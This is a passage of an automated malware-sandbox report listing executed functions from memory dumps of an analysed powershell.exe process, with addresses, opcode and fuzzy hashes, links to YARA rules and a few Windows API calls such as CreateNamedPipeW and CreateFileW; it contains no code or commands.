                                                  • Opcode ID: 0adae00b7bd7bde176a2f886fd1d867120d520b559b87ffab5fec02a3546f4b9
                                                  • Instruction ID: dbc5b74bdfdcab5627672ff2a7111a2a48a06c6255363297c00626fbae9c9856
                                                  • Opcode Fuzzy Hash: 0adae00b7bd7bde176a2f886fd1d867120d520b559b87ffab5fec02a3546f4b9
                                                  • Instruction Fuzzy Hash: 632136B9D006199BCB10DF9AD454ADEFBF8FB48224F10855AE919B3700D774A944CFE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 024CD006, Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.396338087.00000000024CD000.00000040.00000001.sdmp, Offset: 024CD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46479b64bea1899d45d88087e33d7e74380bd2681fd2ca9e392e3c5a51fbfb82
                                                  • Instruction ID: 78bd4e77e74e217af6a96cc9b7676878160919d07ad89ddf84a2772eb469253c
                                                  • Opcode Fuzzy Hash: 46479b64bea1899d45d88087e33d7e74380bd2681fd2ca9e392e3c5a51fbfb82
                                                  • Instruction Fuzzy Hash: F201006140D3C49FD7524B258C94B96BFB4DF43228F1D85DBE9848F2A3C3695849CBB2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 024CD01D, Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.396338087.00000000024CD000.00000040.00000001.sdmp, Offset: 024CD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81ccd5831179a0c57a5f290fab066962d0d8975b457cae39319522beda55469a
                                                  • Instruction ID: ca31d56e40d4f68f93099c04f0a6b23669ac6ca24877148d7dc4ca51555276b0
                                                  • Opcode Fuzzy Hash: 81ccd5831179a0c57a5f290fab066962d0d8975b457cae39319522beda55469a
                                                  • Instruction Fuzzy Hash: 0F01F775804340DAD7508A2ECC84BA7BB8CEF4163CF18842FED441F242C3799986CEB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: powershell.exe PID: 6352 Parent PID: 7156 powershell.exeCOMMON

                                                  Executed Functions

                                                  Function 077AF01C, Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 077AFD60
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547799951.00000000077A0000.00000040.00000010.sdmp, Offset: 077A0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateNamedPipe
                                                  • String ID:
                                                  • API String ID: 2489174969-0
                                                  • Opcode ID: 21f1ba15ceae215c6b377f009ceb2d65e0a63c40d60cce6874bb9593b7882938
                                                  • Instruction ID: 3f1f44e1346ec7463e56d94c90ed1a2319157f1bf9a83d05ef96dffd3a996494
                                                  • Opcode Fuzzy Hash: 21f1ba15ceae215c6b377f009ceb2d65e0a63c40d60cce6874bb9593b7882938
                                                  • Instruction Fuzzy Hash: B95104B1D00309EFDB15CFA9D884BCDBBF2AF88304F24852AE508AB250D7749885CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776E0F0, Relevance: 1.6, Instructions: 1550COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b4703d99bfd1f47f07e5207567f8d3a4e404f97624d27d40cd36dd634fe9030
                                                  • Instruction ID: b1a50a859f351a0d028adcd8e2f6283a9ccaea2ab7401d815b29173fdf665811
                                                  • Opcode Fuzzy Hash: 4b4703d99bfd1f47f07e5207567f8d3a4e404f97624d27d40cd36dd634fe9030
                                                  • Instruction Fuzzy Hash: 1BC227B4B002058FDB14ABB8C4586AE77E7AFC5644F0488A9D906DF3A8DF70DC41DBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07788BE0, Relevance: .7, Instructions: 688COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547675806.0000000007780000.00000040.00000001.sdmp, Offset: 07780000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 672e4c2eda89c98c8d92cb967a54275f5a7fccac122ec22de5686f21fedbef4b
                                                  • Instruction ID: 146b7ca4ecc11c413b41707bf161d6be5c17bcde14cedb156500e1bd9f4fb906
                                                  • Opcode Fuzzy Hash: 672e4c2eda89c98c8d92cb967a54275f5a7fccac122ec22de5686f21fedbef4b
                                                  • Instruction Fuzzy Hash: CC528E70A00219CFDB54EF64C850BAE73B2EF99344F5089A9D90AAB390DB35ED45CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 077A7E88, Relevance: .3, Instructions: 297COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547799951.00000000077A0000.00000040.00000010.sdmp, Offset: 077A0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03bdd2773af3b5bbec8b4281f8476f09352a397ffdd7681af4107f3dc356fecd
                                                  • Instruction ID: d3067759c2dff19fafa6298debd6edf78ad19f5bef4c62ed1ea15f28bed0a210
                                                  • Opcode Fuzzy Hash: 03bdd2773af3b5bbec8b4281f8476f09352a397ffdd7681af4107f3dc356fecd
                                                  • Instruction Fuzzy Hash: E5A19FB4B00201AFDB199B79C854A7EB7E7AFC9290B14C969E506DB380DF35DD01CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0778F968, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547675806.0000000007780000.00000040.00000001.sdmp, Offset: 07780000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 2c9c18d006d811194027eaf04a07f3a249aaa2b214588d94be3e225aa3a3f96d
                                                  • Instruction ID: d2059c53c0b90636387909c356f39c8b545b9d84aa4480ebd49d0137d0f8e6b7
                                                  • Opcode Fuzzy Hash: 2c9c18d006d811194027eaf04a07f3a249aaa2b214588d94be3e225aa3a3f96d
                                                  • Instruction Fuzzy Hash: 0F41A1B1A042499FDB10DFA8D844BDEFFB9EB48354F048569E909AB281C7749944CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0778FA08, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0778F987,00000000,00000000,00000003,00000000,00000002), ref: 0778FA92
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547675806.0000000007780000.00000040.00000001.sdmp, Offset: 07780000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: c95308a302e26ba8ae5ec433cdbdd02f5dc716324fa50a4ea22036911abac842
                                                  • Instruction ID: 5eea92518f95d4b1bab11783b93fa97ca987153f13580e2c729b3581240c539e
                                                  • Opcode Fuzzy Hash: c95308a302e26ba8ae5ec433cdbdd02f5dc716324fa50a4ea22036911abac842
                                                  • Instruction Fuzzy Hash: 19213CB6D002599FCF10CF99D844ADEFBB5FB48364F148519E919A7210C374A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0778F33C, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0778F987,00000000,00000000,00000003,00000000,00000002), ref: 0778FA92
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547675806.0000000007780000.00000040.00000001.sdmp, Offset: 07780000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 31a6ce6dc80b936fafe36dd91f658c8e9be337a4b41c84ced0d88c87ab1265d5
                                                  • Instruction ID: 5b63f9f14d0ff1b3bde915da76096b49fa90e17b50b59167d3e108a4cb543375
                                                  • Opcode Fuzzy Hash: 31a6ce6dc80b936fafe36dd91f658c8e9be337a4b41c84ced0d88c87ab1265d5
                                                  • Instruction Fuzzy Hash: 022128B2900619AFCB00DF99D884ADEFBB4FB08360F04852AE919A7210C375A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776C668, Relevance: .6, Instructions: 613COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e60b5f13abfc9ab945658a2d44ddb208aac292dc19a450f78b8ba33ecbbb17f7
                                                  • Instruction ID: 50aeac6a81c27d9a1a47c16f16a564a35487532919805f021ba6f0dca74e999a
                                                  • Opcode Fuzzy Hash: e60b5f13abfc9ab945658a2d44ddb208aac292dc19a450f78b8ba33ecbbb17f7
                                                  • Instruction Fuzzy Hash: D0427DB4A00205CFCB05DFA8C9989ADBBF2FF89354B1585A9E8459B365DB30EC45CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776C65B, Relevance: .4, Instructions: 388COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 818a6837856e14edf9970d670dd3d53fc925eb8fa14962c306e29636e3f55b24
                                                  • Instruction ID: 75385ca939da1641e3b141297918d4cbf619d015a2400d19e6984bfdb967afd5
                                                  • Opcode Fuzzy Hash: 818a6837856e14edf9970d670dd3d53fc925eb8fa14962c306e29636e3f55b24
                                                  • Instruction Fuzzy Hash: 70F139B4A00209CFCB55DFA8C58899DBBF2FF89354B1185A9E849AB365DB30EC45CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 077680D0, Relevance: .3, Instructions: 328COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0cb925052d77d703579cc16412eabaea41b226b9c3f9353817f9d8f623fcde0b
                                                  • Instruction ID: 7e1bae7da8d58c95df092c70f958322859c55b61e35954598b3c6400723f1f4c
                                                  • Opcode Fuzzy Hash: 0cb925052d77d703579cc16412eabaea41b226b9c3f9353817f9d8f623fcde0b
                                                  • Instruction Fuzzy Hash: 10C19FB5B002059FCB18CF68D498AADBBF2EF48354F148869E916DB3A5CB35EC40CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776BD10, Relevance: .3, Instructions: 322COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42bc260b7d3b176a1cd5594f0b0d1a59667d88bacfebb2a6982ce624fbe8b370
                                                  • Instruction ID: b12f4383f1811ed7b9efd5e587751ae662ded4266540a958e1a9a2368101fd3d
                                                  • Opcode Fuzzy Hash: 42bc260b7d3b176a1cd5594f0b0d1a59667d88bacfebb2a6982ce624fbe8b370
                                                  • Instruction Fuzzy Hash: F4E16E70A0070ACFCB15EFB4C85469AB7B2FF85354F108A99D949AB254EF70E985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776C7FB, Relevance: .3, Instructions: 297COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a91e4dd03dc8fbd0565c105a0e632d19db09bb919219e109533adc24ace413b
                                                  • Instruction ID: e4fd3e7e814d3c9a49b576d875d271f4ba090493466c19eb5cf0bf466725945d
                                                  • Opcode Fuzzy Hash: 4a91e4dd03dc8fbd0565c105a0e632d19db09bb919219e109533adc24ace413b
                                                  • Instruction Fuzzy Hash: 9ED128B4A00205CFCB55DFA8C98896DBBF2FF89354B1185A9E8459B365EB30EC45CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07760BEA, Relevance: .2, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fefd7f457a0a728dcad93694902cbf079ce6b521dfaf523d3f94008e5c1bf38
                                                  • Instruction ID: bc1f8c71bfa192e85b9bda1eff8d7bfa542e68071e3090d168c5d53c9d2c0f7b
                                                  • Opcode Fuzzy Hash: 6fefd7f457a0a728dcad93694902cbf079ce6b521dfaf523d3f94008e5c1bf38
                                                  • Instruction Fuzzy Hash: 6E91E7B8A00219DFDB14DFA8C598EADBBF2AF49754F144858E806AB365CB71EC41CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07760EB7, Relevance: .1, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c83e102cc6b91ed53651e9d36a479556f3238e8a99ba4282b47318ff6905a250
                                                  • Instruction ID: ace0c5eeb2b3524e29d46e39f18498f4b64e05a3a25c7ba90cea18bef67c97f3
                                                  • Opcode Fuzzy Hash: c83e102cc6b91ed53651e9d36a479556f3238e8a99ba4282b47318ff6905a250
                                                  • Instruction Fuzzy Hash: 1451D6B8A00219CFDB14DFA4C598AADBBF6AF49355F144458E806AB364DB70EC42CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776BD00, Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 024ba0b0c4c02c566790dc494a87eb76ff8ab7053698186627f87508fe401d83
                                                  • Instruction ID: 0c23e7b90ef7aa8e402d551d686ee8f188a3942ec555f0f98b728ccfe6443cbd
                                                  • Opcode Fuzzy Hash: 024ba0b0c4c02c566790dc494a87eb76ff8ab7053698186627f87508fe401d83
                                                  • Instruction Fuzzy Hash: 0351ACB090070ACFDB21DF64C88869AF7B1FF45344F208A6AD885BB255DB70E985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776E060, Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96dcd40e9b095b35bcb7052b2ce1cf83d75de32624804ac8924c399ed70adb33
                                                  • Instruction ID: 9d2dcc3fb5a49a2ca9c738e9312e7748b36bfadeb964c5ce2380f840ed36caa9
                                                  • Opcode Fuzzy Hash: 96dcd40e9b095b35bcb7052b2ce1cf83d75de32624804ac8924c399ed70adb33
                                                  • Instruction Fuzzy Hash: D9312AF9A043448FDB1A9A78C81C6DD7BB6BF47650F0548EAD841EF6A6C6608C81C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776137F, Relevance: .1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8187dd6e480669035f80b752ad70d2bbc055ad89734dd2894c17feacee9507d
                                                  • Instruction ID: a1c34fec514b36d5a5ad2211c464a417d15d1d1485ab314407e521f2160b8c4c
                                                  • Opcode Fuzzy Hash: b8187dd6e480669035f80b752ad70d2bbc055ad89734dd2894c17feacee9507d
                                                  • Instruction Fuzzy Hash: 8B41E874B002499FCB10DF65C488ADEBBF2AF89354F548868D845AB755DB30EC45CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776EFF0, Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5591842aea0ec55858856efac7b325b728bcc655d3728ab186dfb99fa7ceb4bc
                                                  • Instruction ID: cf117930773fd18079fed3b094196d84f0d5986e2ad0bd6873f60b0dba0c0173
                                                  • Opcode Fuzzy Hash: 5591842aea0ec55858856efac7b325b728bcc655d3728ab186dfb99fa7ceb4bc
                                                  • Instruction Fuzzy Hash: 903126B5F042058FCB19AABCD4186EE73B6DF85295F14886AD802DB3A4CF34CC41CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07761390, Relevance: .1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c750cd5be7af27f8f224c17fd44ddc5021ac5491737789221aff8630825bc41
                                                  • Instruction ID: 23f7608fd1a8989428157936958d80b14c0583e4e4fb3a1a1294780b4db8ebc4
                                                  • Opcode Fuzzy Hash: 3c750cd5be7af27f8f224c17fd44ddc5021ac5491737789221aff8630825bc41
                                                  • Instruction Fuzzy Hash: 6E419374B002099FCB14DFA9C588A9EBBF7AF88354F548868D845AB755EB30EC45CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07760828, Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe7233f3176735a71983dbe7dbd13a4bc59aef36e9fa6866695c1cc351189d2b
                                                  • Instruction ID: 83bf5a82ac62b936289edaacfeaee892b32caa215a4a7516619812c0039c62c5
                                                  • Opcode Fuzzy Hash: fe7233f3176735a71983dbe7dbd13a4bc59aef36e9fa6866695c1cc351189d2b
                                                  • Instruction Fuzzy Hash: CC416D74600701CFDB54EF24C459AAABBB2AF89355F1489BDD809AB394CF35AC81CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776EFE3, Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc3beb6a7abf22759d32c4ef0a07a77d258beda6a04cd39b25d69ba8b700645a
                                                  • Instruction ID: ce92636148373e71f5b76874ce1a984b88e1078865c2f6a69a28ce194ea12073
                                                  • Opcode Fuzzy Hash: fc3beb6a7abf22759d32c4ef0a07a77d258beda6a04cd39b25d69ba8b700645a
                                                  • Instruction Fuzzy Hash: E731F9F5F002158BDF29AA6CE4486ED73B5DF49694F14886AD811AB3A4CB31DC81CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07760819, Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 75483a5084289ba6dcebcfdbc4aa24e4db0b3dc3a2951fc87819160df0cd30ad
                                                  • Instruction ID: 0f662438fc3914e3c61117e32ab29eefa3003104e31af4710e27b5fbc83aed45
                                                  • Opcode Fuzzy Hash: 75483a5084289ba6dcebcfdbc4aa24e4db0b3dc3a2951fc87819160df0cd30ad
                                                  • Instruction Fuzzy Hash: 4B318D74600601DFCB55EF34C458AAABBB2AF89355F1485BDD409AB394CF32AC41CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776E080, Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4db5efcafdf80d682f922aa0a0e23956a1842f15b41c7899c8c485c1be31e83d
                                                  • Instruction ID: 891c488962bef68d62b1710bde666c254f589b06ca259112a2fcc88bcb95c3f7
                                                  • Opcode Fuzzy Hash: 4db5efcafdf80d682f922aa0a0e23956a1842f15b41c7899c8c485c1be31e83d
                                                  • Instruction Fuzzy Hash: 3C113BF920A3904FC70B5738A8290D93F7AAF075A130904D7E848CF297CE694C49D7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776D678, Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f40137bbafc148272a0109984f0625b35f8a4042ed576d45c15aa1ff8a7cebf
                                                  • Instruction ID: d4f014bfcff32ad4002ee8dbe5d9e2faab327a4f6e6c6f9c92b6e4cc73c32299
                                                  • Opcode Fuzzy Hash: 0f40137bbafc148272a0109984f0625b35f8a4042ed576d45c15aa1ff8a7cebf
                                                  • Instruction Fuzzy Hash: 5A2136B0B002855BDF25CFA0C848AEF7FB39F89398F184868D845AB295DB315D45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776D4A8, Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7600df2f5bbbcd83b13ea01c23fa2c5decf7ac3ebc45015696ffeac74169e9a0
                                                  • Instruction ID: 42fd328489291157628d5f933414e1dd3928fbd520770c32cf1e8f511bca3eec
                                                  • Opcode Fuzzy Hash: 7600df2f5bbbcd83b13ea01c23fa2c5decf7ac3ebc45015696ffeac74169e9a0
                                                  • Instruction Fuzzy Hash: 83219DB1B002059BDB18DBB5C454AEEBBE7AB88244F188429C815A7388EF749D458BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776D688, Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e47732a97803bcd693babd7274287163ec66eb909253fab9d7adc7ef2490029
                                                  • Instruction ID: 2b6423e3952d20891bd36b145ed9c0c69605025ef3593a33c4300017997cb56e
                                                  • Opcode Fuzzy Hash: 5e47732a97803bcd693babd7274287163ec66eb909253fab9d7adc7ef2490029
                                                  • Instruction Fuzzy Hash: E111FD70B002005BDB25CFA0C884AEF7BB7AF88344F184868D806AB295DF719D45CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776D499, Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aae8c9d6c0514559d76167ddde297f48e78162d8efdef69473423659a572f1ae
                                                  • Instruction ID: b81f3b622c798954b650db52f2ad69538e8a925cf95f90ae2aa7efa1c7a1d4d3
                                                  • Opcode Fuzzy Hash: aae8c9d6c0514559d76167ddde297f48e78162d8efdef69473423659a572f1ae
                                                  • Instruction Fuzzy Hash: F921C3B1F002059BDB18CBB5C4446DEFBB6BF88344F24C42AC815B7698DB30A945CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 077602CF, Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71cca55904b65b30337eee9989f3aa85d8575960c1079ec7fb9ca64d015a2456
                                                  • Instruction ID: 1de9edb2269d20cabe47afd772fb4010a60bc4534f1b7a210dccad2b308a7c29
                                                  • Opcode Fuzzy Hash: 71cca55904b65b30337eee9989f3aa85d8575960c1079ec7fb9ca64d015a2456
                                                  • Instruction Fuzzy Hash: 88118F76A502158FCB18DF24C948AEEB7B5BF88755F110968D912AB2B0CF71DC02DF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07760783, Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9dd9697757914c598455bea392975dbd0001fc9f89075a5a25b4d95fdb7ea392
                                                  • Instruction ID: 4971d8c04df18948048fc89f7ba6033a85a7e42bd10456fc08adef23b89180fb
                                                  • Opcode Fuzzy Hash: 9dd9697757914c598455bea392975dbd0001fc9f89075a5a25b4d95fdb7ea392
                                                  • Instruction Fuzzy Hash: 0B118EB5B012058FCB00DFB9C884DAABBF6EF89354B1549A6E504DB252D730ED4ACF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07760790, Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee5855f9428abf11c955f8f6e281c1992c403a589880df6d3b9404b4b19c7f1b
                                                  • Instruction ID: 4632d3982510d145fc551cd7982e673e12116aa82286253a838449b6221bd186
                                                  • Opcode Fuzzy Hash: ee5855f9428abf11c955f8f6e281c1992c403a589880df6d3b9404b4b19c7f1b
                                                  • Instruction Fuzzy Hash: AC014079B002059F8B00DFA9C884DABBBEAEF88354B154565D505EB351E730E949CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776FBF7, Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e18e2abf1f6761ce31fc37a2b9b7ed07fdf2437046b483adebd9b1d8032d7440
                                                  • Instruction ID: c70cb7cf8fdef86fdd3109f1390f68a4a618d340745d0d9a921ba09f661a240f
                                                  • Opcode Fuzzy Hash: e18e2abf1f6761ce31fc37a2b9b7ed07fdf2437046b483adebd9b1d8032d7440
                                                  • Instruction Fuzzy Hash: 70113CB1D00219AFDB04CFA9E854AEEBFF6AF49310F148426EC15B7250DB719A50DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776FBF8, Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c73ff166aad4f7f11863a43954d31de2599abe027f624825cde43b560ebb996
